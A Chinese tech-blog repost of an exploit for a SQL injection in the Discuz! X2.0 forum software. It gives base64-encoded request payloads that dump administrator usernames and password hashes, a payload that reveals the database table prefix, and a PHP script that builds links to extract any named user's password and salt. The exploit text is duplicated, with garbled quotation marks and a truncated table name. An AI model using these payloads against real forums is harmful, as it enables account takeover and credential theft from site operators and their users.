USB迷 | 专注于互联网分享

    最新消息: USBMI致力于为网友们分享Windows、安卓、IOS等主流手机系统相关的资讯以及评测、同时提供相关教程、应用、软件下载等服务。
    你的位置: 首页 > IT圈 > Discuz! X2.0 SQL注入漏洞 EXP

    Discuz! X2.0 SQL注入漏洞 EXP

    IT圈 admin 52浏览 0评论

    2024年2月25日发(作者:厚晨菲)

    DZ2.0直接暴管理账号密码(默认前缀的情况下)

    /?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

    sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd

    29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl

    rZSAnYWRtaW58eHx5%3D

    base64解码

    1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)

    from pre_common_member where username like ‗admin|x|y

    如果不是默认前缀

    暴前缀EXP

    /?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

    sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR

    VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1

    FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

    ———————–

    再贴个PHP的EXP

    $host=”X2.0论坛地址”;

    $affuser=”要爆的用户名username”;

    echo ‗

    echo $host.‖?mod=attachment&findpost=ss&aid=‖;

    echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from

    INFORMATION_ where TABLE_SCHEMA=database() and TABLE_NAME

    like ‘%_member|x|y”));

    echo ‘” target=”_blank”>爆前缀’;

    echo ―
    ‖;

    echo ‗

    echo $host.‖?mod=attachment&findpost=ss&aid=‖;

    echo urlencode(base64_encode(“1′ and 1=2 union all select

    1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username

    like ‘$affuser|x|y”));

    echo ‘” target=”_blank”>爆password,salt’;

    ?>

    2024年2月25日发(作者:厚晨菲)

    DZ2.0直接暴管理账号密码(默认前缀的情况下)

    /?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

    sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd

    29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl

    rZSAnYWRtaW58eHx5%3D

    base64解码

    1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)

    from pre_common_member where username like ‗admin|x|y

    如果不是默认前缀

    暴前缀EXP

    /?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V

    sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR

    VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1

    FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

    ———————–

    再贴个PHP的EXP

    $host=”X2.0论坛地址”;

    $affuser=”要爆的用户名username”;

    echo ‗

    echo $host.‖?mod=attachment&findpost=ss&aid=‖;

    echo urlencode(base64_encode(“1′ and 1=2 union all select 1,TABLE_NAME from

    INFORMATION_ where TABLE_SCHEMA=database() and TABLE_NAME

    like ‘%_member|x|y”));

    echo ‘” target=”_blank”>爆前缀’;

    echo ―
    ‖;

    echo ‗

    echo $host.‖?mod=attachment&findpost=ss&aid=‖;

    echo urlencode(base64_encode(“1′ and 1=2 union all select

    1,group_concat(username,0x7C,password,0x7C,salt) from pre_ucenter_members where username

    like ‘$affuser|x|y”));

    echo ‘” target=”_blank”>爆password,salt’;

    ?>

    与本文相关的文章

    发布评论

    评论列表 (0)

    1. 暂无评论